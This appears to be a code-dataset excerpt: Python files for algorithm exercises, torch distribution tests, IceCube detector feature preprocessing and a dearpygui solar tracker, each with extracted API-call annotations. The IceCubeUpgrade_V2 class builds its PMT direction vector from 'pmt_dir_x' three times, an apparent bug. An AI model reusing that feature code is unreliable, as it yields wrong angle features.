t_csi = min(timeit.repeat(stmt='counting_sort_improved(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort_improved
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
tbl.row([n, t_cs, t_csi])
return tbl
def run_median_trial():
"""Generate table for Median Trial."""
tbl = DataTable([10,15,15],['N', 'median_time', 'sort_median'])
trials = [2**k+1 for k in range(8,20)]
for n in trials:
t_med = 1000*min(timeit.repeat(stmt='assert(linear_median(a) == {}//2)'.format(n),
setup='''
import random
from ch01.challenge import linear_median
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
t_sort = 1000*min(timeit.repeat(stmt='assert(median_from_sorted_list(a) == {0}//2)'.format(n),
setup='''
import random
from ch01.challenge import median_from_sorted_list
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
tbl.row([n, t_med, t_sort])
return tbl
def run_median_less_than_trial(max_k=20, output=True):
"""Use RecordedItem to count # of times Less-than invoked up to (but not including) max_k=20."""
tbl = DataTable([10,15,15],['N', 'median_count', 'sort_median_count'], output=output)
tbl.format('median_count', ',d')
tbl.format('sort_median_count', ',d')
trials = [2**k+1 for k in range(8, max_k)]
for n in trials:
A = list([RecordedItem(i) for i in range(n)])
random.shuffle(A)
# Generated external sorted to reuse list
RecordedItem.clear()
med2 = median_from_sorted_list(A)
sort_lt = RecordedItem.report()[1]
RecordedItem.clear()
med1 = linear_median(A)
lin_lt = RecordedItem.report()[1]
assert med1 == med2
tbl.row([n, lin_lt, sort_lt])
return tbl
def is_palindrome1(w):
"""Create slice with negative step and confirm equality with w."""
return w[::-1] == w
def is_palindrome2(w):
"""Strip outermost characters if same, return false when mismatch."""
while len(w) > 1:
if w[0] != w[-1]: # if mismatch, return False
return False
w = w[1:-1] # strip characters on either end; repeat
return True # must have been a Palindrome
def is_palindrome3(w):
"""iterate from start and from end and compare, without copying arrays"""
for i in range(0,round(len(w)/2)):
if w[i] != w[-(i+1)]:
return False
return True # must have been a Palindrome
def is_palindrome_letters_only(s):
"""
Confirm Palindrome, even when string contains non-alphabet letters
and ignore capitalization.
casefold() method, which was introduced in Python 3.3, could be
used instead of this older method, which converts to lower().
"""
i = 0
j = hi = len(s) - 1
while i < j:
# This type of logic appears in partition.
# Find alpha characters and compare
while not s[i].isalpha():
i += 1
if i == hi: break
while not s[j].isalpha():
j -= 1
if j == 0: break
if s[i].lower() != s[j].lower(): return False
i += 1
j -= 1
return True
def tournament_allows_odd(A):
"""
Returns two largest values in A. Works for odd lists
"""
from ch01.largest_two import Match
if len(A) < 2:
raise ValueError('Must have at least two values')
tourn = []
for i in range(0, len(A)-1, 2):
tourn.append(Match(A[i], A[i+1]))
odd_one_out = None
if len(A) % 2 == 1:
odd_one_out = A[-1]
while len(tourn) > 1:
tourn.append(Match.advance(tourn[0], tourn[1]))
del tourn[0:2]
# Find where second is hiding!
m = tourn[0]
largest = m.larger
second = m.smaller
# Wait until the end, and see where it belongs
if odd_one_out:
if odd_one_out > largest:
largest,second = odd_one_out,largest
elif odd_one_out > second:
second = odd_one_out
while m.prior:
m = m.prior
if second < m.smaller:
second = m.smaller
return (largest,second)
def two_largest_attempt(A):
"""Failed attempt to implement two largest."""
m1 = max(A[:len(A)//2])
m2 = max(A[len(A)//2:])
if m1 < m2:
return (m2, m1)
return (m1, m2)
#######################################################################
if __name__ == '__main__':
chapter = 1
with ExerciseNum(1) as exercise_number:
sample = 'A man, a plan, a canal. Panama!'
print(sample,'is a palindrome:', is_palindrome_letters_only(sample))
print(caption(chapter, exercise_number),
'Palindrome Detector')
with ExerciseNum(2) as exercise_number:
run_median_less_than_trial()
print()
run_median_trial()
print(caption(chapter, exercise_number),
'Median Counting')
with ExerciseNum(3) as exercise_number:
run_counting_sort_trials()
print(caption(chapter, exercise_number),
'Counting Sort Trials')
with ExerciseNum(4) as exercise_number:
print('see tournament_allows_odd in ch01.challenge')
print(caption(chapter, exercise_number),
'Odd tournament')
with ExerciseNum(5) as exercise_number:
print('Should print (9, 8)', two_largest_attempt([9, 3, 5, 7, 8, 1]))
print('Fails to print (9, 8)', two_largest_attempt([9, 8, 5, 7, 3, 1]))
print(caption(chapter, exercise_number),
'Failed Two largest')
| [
"random.shuffle",
"algs.table.caption",
"ch01.largest_two.Match.advance",
"algs.counting.RecordedItem.report",
"algs.counting.RecordedItem.clear",
"algs.table.ExerciseNum",
"ch01.largest_two.Match",
"algs.counting.RecordedItem",
"algs.table.DataTable",
"random.randint"
] | [((2712, 2803), 'algs.table.DataTable', 'DataTable', (['[8, 15, 15]', "['N', 'counting_sort', 'counting_sort_improved']"], {'output': 'output'}), "([8, 15, 15], ['N', 'counting_sort', 'counting_sort_improved'],\n output=output)\n", (2721, 2803), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((3774, 3834), 'algs.table.DataTable', 'DataTable', (['[10, 15, 15]', "['N', 'median_time', 'sort_median']"], {}), "([10, 15, 15], ['N', 'median_time', 'sort_median'])\n", (3783, 3834), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((4685, 4772), 'algs.table.DataTable', 'DataTable', (['[10, 15, 15]', "['N', 'median_count', 'sort_median_count']"], {'output': 'output'}), "([10, 15, 15], ['N', 'median_count', 'sort_median_count'], output=\n output)\n", (4694, 4772), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((1307, 1329), 'random.randint', 'random.randint', (['lo', 'hi'], {}), '(lo, hi)\n', (1321, 1329), False, 'import random\n'), ((4975, 4992), 'random.shuffle', 'random.shuffle', (['A'], {}), '(A)\n', (4989, 4992), False, 'import random\n'), ((5052, 5072), 'algs.counting.RecordedItem.clear', 'RecordedItem.clear', ([], {}), '()\n', (5070, 5072), False, 'from algs.counting import RecordedItem\n'), ((5167, 5187), 'algs.counting.RecordedItem.clear', 'RecordedItem.clear', ([], {}), '()\n', (5185, 5187), False, 'from algs.counting import RecordedItem\n'), ((8029, 8043), 'algs.table.ExerciseNum', 'ExerciseNum', (['(1)'], {}), '(1)\n', (8040, 8043), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8288, 8302), 'algs.table.ExerciseNum', 'ExerciseNum', (['(2)'], {}), '(2)\n', (8299, 8302), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8495, 8509), 'algs.table.ExerciseNum', 'ExerciseNum', (['(3)'], {}), '(3)\n', (8506, 8509), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8662, 8676), 'algs.table.ExerciseNum', 'ExerciseNum', (['(4)'], {}), '(4)\n', (8673, 8676), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8849, 8863), 'algs.table.ExerciseNum', 'ExerciseNum', (['(5)'], {}), '(5)\n', (8860, 8863), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((5133, 5154), 'algs.counting.RecordedItem.report', 'RecordedItem.report', ([], {}), '()\n', (5152, 5154), False, 'from algs.counting import RecordedItem\n'), ((5237, 5258), 'algs.counting.RecordedItem.report', 'RecordedItem.report', ([], {}), '()\n', (5256, 5258), False, 'from algs.counting import RecordedItem\n'), ((7052, 7073), 'ch01.largest_two.Match', 'Match', (['A[i]', 'A[i + 1]'], {}), '(A[i], A[i + 1])\n', (7057, 7073), False, 'from ch01.largest_two import Match\n'), ((7196, 7229), 'ch01.largest_two.Match.advance', 'Match.advance', (['tourn[0]', 'tourn[1]'], {}), '(tourn[0], tourn[1])\n', (7209, 7229), False, 'from ch01.largest_two import Match\n'), ((8206, 8239), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8213, 8239), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8417, 8450), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8424, 8450), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8579, 8612), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8586, 8612), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8772, 8805), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8779, 8805), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((9056, 9089), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (9063, 9089), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((4931, 4946), 'algs.counting.RecordedItem', 'RecordedItem', (['i'], {}), '(i)\n', (4943, 4946), False, 'from algs.counting import RecordedItem\n')] |
import torch
import pytest
# NOTE: also registers the KL divergence
from chmp.torch_utils import NormalModule, WeightsHS, fixed
def test_kl_divergence__gamma__log_normal():
p = torch.distributions.LogNormal(torch.zeros(2), torch.ones(2))
q = torch.distributions.Gamma(torch.ones(2), torch.ones(2))
torch.distributions.kl_divergence(p, q)
def test__module_parameters():
module = NormalModule(loc=torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
module = NormalModule(loc=torch.zeros(1), scale=torch.ones(1))
assert {k for k, _ in module.named_parameters()} == {"loc", "scale"}
module = NormalModule(torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
def test__module_fixed_parameters_optimize():
module = NormalModule(torch.zeros(1), fixed(torch.ones(1)))
optimizer = torch.optim.Adam(module.parameters(), lr=0.1)
for _ in range(100):
optimizer.zero_grad()
x = module.rsample((20,))
loss = torch.mean((x - 2.0) ** 2.0)
loss.backward()
optimizer.step()
assert float(module.loc) != pytest.approx(0.0)
assert float(module.scale) == pytest.approx(1.0)
def test_weight_hs_api():
w = WeightsHS([10, 20, 30], tau_0=1e-5)
assert w().shape == (10, 20, 30)
assert w.kl_divergence().shape == ()
| [
"pytest.approx",
"torch.mean",
"torch.distributions.kl_divergence",
"chmp.torch_utils.WeightsHS",
"torch.zeros",
"torch.ones"
] | [((314, 353), 'torch.distributions.kl_divergence', 'torch.distributions.kl_divergence', (['p', 'q'], {}), '(p, q)\n', (347, 353), False, 'import torch\n'), ((1303, 1339), 'chmp.torch_utils.WeightsHS', 'WeightsHS', (['[10, 20, 30]'], {'tau_0': '(1e-05)'}), '([10, 20, 30], tau_0=1e-05)\n', (1312, 1339), False, 'from chmp.torch_utils import NormalModule, WeightsHS, fixed\n'), ((214, 228), 'torch.zeros', 'torch.zeros', (['(2)'], {}), '(2)\n', (225, 228), False, 'import torch\n'), ((230, 243), 'torch.ones', 'torch.ones', (['(2)'], {}), '(2)\n', (240, 243), False, 'import torch\n'), ((279, 292), 'torch.ones', 'torch.ones', (['(2)'], {}), '(2)\n', (289, 292), False, 'import torch\n'), ((294, 307), 'torch.ones', 'torch.ones', (['(2)'], {}), '(2)\n', (304, 307), False, 'import torch\n'), ((695, 709), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (706, 709), False, 'import torch\n'), ((877, 891), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (888, 891), False, 'import torch\n'), ((1083, 1111), 'torch.mean', 'torch.mean', (['((x - 2.0) ** 2.0)'], {}), '((x - 2.0) ** 2.0)\n', (1093, 1111), False, 'import torch\n'), ((1195, 1213), 'pytest.approx', 'pytest.approx', (['(0.0)'], {}), '(0.0)\n', (1208, 1213), False, 'import pytest\n'), ((1248, 1266), 'pytest.approx', 'pytest.approx', (['(1.0)'], {}), '(1.0)\n', (1261, 1266), False, 'import pytest\n'), ((417, 431), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (428, 431), False, 'import torch\n'), ((557, 571), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (568, 571), False, 'import torch\n'), ((579, 592), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (589, 592), False, 'import torch\n'), ((899, 912), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (909, 912), False, 'import torch\n'), ((445, 458), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (455, 458), False, 'import torch\n'), ((723, 736), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (733, 736), False, 'import torch\n')] |
import torch
from torch_geometric.data import Data
from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute
from graphnet.data.constants import FEATURES
from graphnet.models.detector.detector import Detector
class IceCube86(Detector):
"""`Detector` class for IceCube-86."""
# Implementing abstract class attribute
features = FEATURES.ICECUBE86
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 100. # dom_x
data.x[:,1] /= 100. # dom_y
data.x[:,2] += 350. # dom_z
data.x[:,2] /= 100.
data.x[:,3] /= 1.05e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,3] *= 20.
data.x[:,4] /= 1. # charge
data.x[:,5] -= 1.25 # rde
data.x[:,5] /= 0.25
data.x[:,6] /= 0.05 # pmt_area
return data
class IceCubeDeepCore(IceCube86):
"""`Detector` class for IceCube-DeepCore."""
class IceCubeUpgrade(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
return data
class IceCubeUpgrade_V2(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
@property
def nb_outputs(self):
return self.nb_inputs + 3
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Assign pulse cluster indices to DOMs and PMTs, respectively
data = group_pulses_to_dom(data)
data = group_pulses_to_pmt(data)
# Feature engineering inspired by Linea Hedemark and Tetiana Kozynets.
xyz = torch.stack((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)
pmt_dir = torch.stack((data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x']), dim=1)
charge = data['charge'].unsqueeze(dim=1)
center_of_gravity = sum_pool_and_distribute(xyz * charge, data.batch) / sum_pool_and_distribute(charge, data.batch)
vector_to_center_of_gravity = center_of_gravity - xyz
distance_to_center_of_gravity = torch.norm(vector_to_center_of_gravity, p=2, dim=1)
unit_vector_to_center_of_gravity = vector_to_center_of_gravity / (distance_to_center_of_gravity.unsqueeze(dim=1) + 1e-3)
cos_angle_wrt_center_of_gravity = (pmt_dir * unit_vector_to_center_of_gravity).sum(dim=1)
photoelectrons_on_pmt = sum_pool_and_distribute(data['charge'], data.pmt_index, data.batch).floor().clip(1, None)
# Add new features
data.x = torch.cat((
data.x,
photoelectrons_on_pmt.unsqueeze(dim=1),
distance_to_center_of_gravity.unsqueeze(dim=1),
cos_angle_wrt_center_of_gravity.unsqueeze(dim=1),
), dim=1)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
# -- Engineered features
data.x[:,14] = torch.log10(data.x[:,14]) / 2. # photoelectrons_on_pmt
data.x[:,15] = torch.log10(1e-03 + data.x[:,15]) / 2. # distance_to_center_of_gravity
return data | [
"graphnet.components.pool.group_pulses_to_dom",
"torch.stack",
"torch.log10",
"graphnet.components.pool.group_pulses_to_pmt",
"graphnet.components.pool.sum_pool_and_distribute",
"torch.norm"
] | [((3121, 3146), 'graphnet.components.pool.group_pulses_to_dom', 'group_pulses_to_dom', (['data'], {}), '(data)\n', (3140, 3146), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((3162, 3187), 'graphnet.components.pool.group_pulses_to_pmt', 'group_pulses_to_pmt', (['data'], {}), '(data)\n', (3181, 3187), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((3282, 3347), 'torch.stack', 'torch.stack', (["(data['dom_x'], data['dom_y'], data['dom_z'])"], {'dim': '(1)'}), "((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)\n", (3293, 3347), False, 'import torch\n'), ((3366, 3443), 'torch.stack', 'torch.stack', (["(data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x'])"], {'dim': '(1)'}), "((data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x']), dim=1)\n", (3377, 3443), False, 'import torch\n'), ((3719, 3770), 'torch.norm', 'torch.norm', (['vector_to_center_of_gravity'], {'p': '(2)', 'dim': '(1)'}), '(vector_to_center_of_gravity, p=2, dim=1)\n', (3729, 3770), False, 'import torch\n'), ((1981, 2006), 'torch.log10', 'torch.log10', (['data.x[:, 4]'], {}), '(data.x[:, 4])\n', (1992, 2006), False, 'import torch\n'), ((3521, 3570), 'graphnet.components.pool.sum_pool_and_distribute', 'sum_pool_and_distribute', (['(xyz * charge)', 'data.batch'], {}), '(xyz * charge, data.batch)\n', (3544, 3570), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((3573, 3616), 'graphnet.components.pool.sum_pool_and_distribute', 'sum_pool_and_distribute', (['charge', 'data.batch'], {}), '(charge, data.batch)\n', (3596, 3616), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((4614, 4639), 'torch.log10', 'torch.log10', (['data.x[:, 4]'], {}), '(data.x[:, 4])\n', (4625, 4639), False, 'import torch\n'), ((5122, 5148), 'torch.log10', 'torch.log10', (['data.x[:, 14]'], {}), '(data.x[:, 14])\n', (5133, 5148), False, 'import torch\n'), ((5201, 5235), 'torch.log10', 'torch.log10', (['(0.001 + data.x[:, 15])'], {}), '(0.001 + data.x[:, 15])\n', (5212, 5235), False, 'import torch\n'), ((4030, 4097), 'graphnet.components.pool.sum_pool_and_distribute', 'sum_pool_and_distribute', (["data['charge']", 'data.pmt_index', 'data.batch'], {}), "(data['charge'], data.pmt_index, data.batch)\n", (4053, 4097), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n')] |
import dearpygui.dearpygui as dpg
import datetime as dt
import math
from registry import *
SUN_DATA.update_date()
# FUNCTIONS
def get_semi_circle_points( center, radius, angle_i, angle_f, segments = 360, closed = False ):
points_close = [[ center[0], center[1]-radius ] , center, [ center[0] + radius, center[1] ] ]
angles = [ ((angle_f - angle_i)/segments)*n for n in range(segments) ]
points = [ [ center[0] + radius*math.cos(ang), center[1] - radius*math.sin(ang) ] for ang in angles ]
if closed:
points_close.extend( points )
return points_close
else:
return points
def draw_sun_trajetory( draw_id, parent_id, all_day = False, extremes = False ):
# Ponto central, dimensões da tela e Raio
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
# DESENHO DA LINHA DE NASCER DO SOL E POR DO SOL
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
# PEGA OS ANGULOS NOS PONTOS DA TRAJETÓRIA DO SOL
dots = SUN_DATA.trajetory(100, all_day )
# PONTOS DE ACORDO COM Azimute - Altitude
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
# DESENHO DO SOL NA SUA POSIÇÃO
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
dpg.draw_line( parent = draw_id, tag = id_link+1 , p1 = [center[0] - r, center[1]] , p2 = [center[0] + r, center[1]] , color = COLOR['gray'](155) , thickness = 1 )
dpg.draw_line( parent = draw_id, tag = id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)], color = COLOR['orange'](155), thickness = 2 )
dpg.draw_line( parent = draw_id, tag = id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)], color = COLOR['gray'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+4 , center = center , radius = r , color = COLOR['white'](200) , fill = COLOR['white'](10 ), thickness = 3 )
dpg.draw_circle( parent = draw_id, tag = id_link+5 , center = center , radius = 3 , color = COLOR['white'](200) , fill = COLOR['white'](255), thickness = 2 )
dpg.draw_text( parent = draw_id, tag = id_link+6 , pos = [center[0] -(r +20), center[1] -10 ] , text = 'W' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+7 , pos = [center[0] +(r +5) , center[1] -10 ] , text = 'E' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+8 , pos = [center[0] -10 , center[1] -(r +25)], text = 'N' , color = COLOR['white'](255) , size = 20 )
dpg.draw_polyline( parent = draw_id, tag = id_link+9 , points = dots , color = COLOR['red'](155) , thickness = 2 , closed = False )
for n, p in enumerate(dots):
dpg.draw_circle( parent = draw_id, tag = id_link+(12+n) , center = p , radius = 2 , color = [n*4, 255-n*2, n*2, 255] )
dpg.draw_line( parent = draw_id, tag = id_link+10 , p1 = center, p2 = sun, color = COLOR['yellow'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+11 , center = sun , radius = 10 , color = COLOR['yellow'](155) , fill = COLOR['yellow'](255) )
def update_sun_trajetory( draw_id, parent_id, all_day = False ):
# Ponto central, dimensões da tela e Raio
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
w, h = dpg.get_item_width( 'mainWindow' ) , dpg.get_item_height('mainWindow' )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
# DESENHO DA LINHA DE NASCER DO SOL E POR DO SOL
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
# PEGA OS ANGULOS NOS PONTOS DA TRAJETÓRIA DO SOL
dots = SUN_DATA.trajetory(100, all_day )
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
# DESENHO DO SOL NA SUA POSIÇÃO
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
# DESENHO ESTÁTICO
dpg.configure_item( id_link+1 , p1 = [center[0] - r, center[1]], p2 = [center[0] + r, center[1]] )
dpg.configure_item( id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)] )
dpg.configure_item( id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)] )
dpg.configure_item( id_link+4 , center = center , radius = r )
dpg.configure_item( id_link+5 , center = center , radius = 3 )
dpg.configure_item( id_link+6 , pos = [center[0] - (r + 20), center[1] -10 ] )
dpg.configure_item( id_link+7 , pos = [center[0] + (r + 5), center[1] -10 ] )
dpg.configure_item( id_link+8 , pos = [center[0] - 10 , center[1] - (r + 25) ] )
dpg.configure_item( id_link+9 , points = dots )
dpg.configure_item( id_link+10, p1 = center , p2 = sun )
dpg.configure_item( id_link+11, center = sun )
for n, p in enumerate(dots):
dpg.configure_item( id_link+(12+n) , center = p )
def att_sunpos_graphs( ):
last_date = SUN_DATA.date
if not dpg.get_value( HORA_MANUAL ): SUN_DATA.set_date( dt.datetime.utcnow() )
else: SUN_DATA.set_date( dt.datetime( dpg.get_value(YEAR), dpg.get_value(MONTH), dpg.get_value(DAY), dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND) ) )
azi_alt = SUN_DATA.trajetory( 50, all_day = False )
SUN_DATA.set_date( last_date )
AZI = []
ALT = []
PTI = []
for azi, alt, tim in azi_alt:
AZI.append( math.degrees(azi - math.pi) if azi > math.pi else math.degrees(azi + math.pi) )
ALT.append( math.degrees(alt) if alt < math.pi else 0 )
PTI.append( int( dt.datetime.timestamp( tim )) )
azi, alt = [math.degrees(SUN_DATA.azi)], [math.degrees(SUN_DATA.alt)]
time_scrt = [math.degrees(dt.datetime.timestamp( last_date ))]
SUN_DATA.set_date( last_date )
dpg.configure_item (22_13, x = PTI , y = AZI )
dpg.configure_item (22_14, x = time_scrt, y = azi )
dpg.set_axis_limits(22_11, ymin = PTI[0] , ymax = PTI[-1] )
dpg.configure_item (22_23, x = PTI , y = ALT )
dpg.configure_item (22_24, x = time_scrt, y = alt )
dpg.set_axis_limits(22_21, ymin = PTI[0] , ymax = PTI[-1] )
# MAIN FUNCTIONS
def init_visualizacaoGeral( windows : dict ):
# POSIÇÂO DO SOL
with dpg.window( label = 'Posição solar' , tag = 21_0, pos = [50,50], width = 500 , height = 500 , no_move = True, no_resize = True, no_collapse = True, no_close = True, no_title_bar= True ) as Posicao_sol_VG:
windows["Visualizacao geral"].append( Posicao_sol_VG )
w, h = dpg.get_item_width(2_1_0), dpg.get_item_height(2_1_0)
dpg.add_drawlist ( tag = 21_1_0, width = w-20 , height = h-50, label = 'Solar')
draw_sun_trajetory ( draw_id = 2_1_1_0, parent_id = 2_1_0 )
# VISOR DAS POSIÇÔES DO SOL - USAR GRÀFICOS - MESMO DO TOOLTIP
with dpg.window( label = 'Atuação' , tag = 22_0, no_move = True , no_resize = True, no_collapse = True, no_close = True ) as Atuacao_VG:
windows["Visualizacao geral"].append( Atuacao_VG )
dpg.add_text('Área para a atução da posição dos paineis solares')
with dpg.group( horizontal = True ):
with dpg.plot( tag = 2_2_1_0, label = 'Azimute do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_legend()
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_1_1, parent = 2_2_1_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_1_2, parent = 2_2_1_0 ) # Y
dpg.set_axis_limits_auto( 2_2_1_1 )
dpg.set_axis_limits ( 2_2_1_2, -5, 370 )
dpg.add_line_series ( [], [], tag = 2_2_1_3, label = 'Rota diária', parent = 2_2_1_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_1_4, label = 'Ponto atual', parent = 2_2_1_2 )
with dpg.plot( tag = 2_2_2_0, label = 'Altitude do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_2_1, parent = 2_2_2_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_2_2, parent = 2_2_2_0 ) # Y
dpg.set_axis_limits_auto( 2_2_2_1 )
dpg.set_axis_limits ( 2_2_2_2, -5, 100 )
dpg.add_plot_legend()
dpg.add_line_series ( [], [], tag = 2_2_2_3, label = 'Rota diária', parent = 2_2_2_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_2_4, label = 'Ponto atual', parent = 2_2_2_2 )
att_sunpos_graphs( )
# CONFIGURAÇÔES DE TEMPO - USAR WINDOW NO HOUR_MANUAL
with dpg.window( label = 'Painel de log' , tag = 23_0, no_move = True , no_resize = True, no_collapse = True, no_close = True, no_title_bar = True ) as Painel_log_VG:
windows["Visualizacao geral"].append( Painel_log_VG )
dpg.add_text( default_value = 'Informações gerais do sistema')
with dpg.child_window( tag = 23_00, autosize_x = True, height = 170, menubar = True):
with dpg.menu_bar( tag = 23_01, label = 'menubar para datetime',):
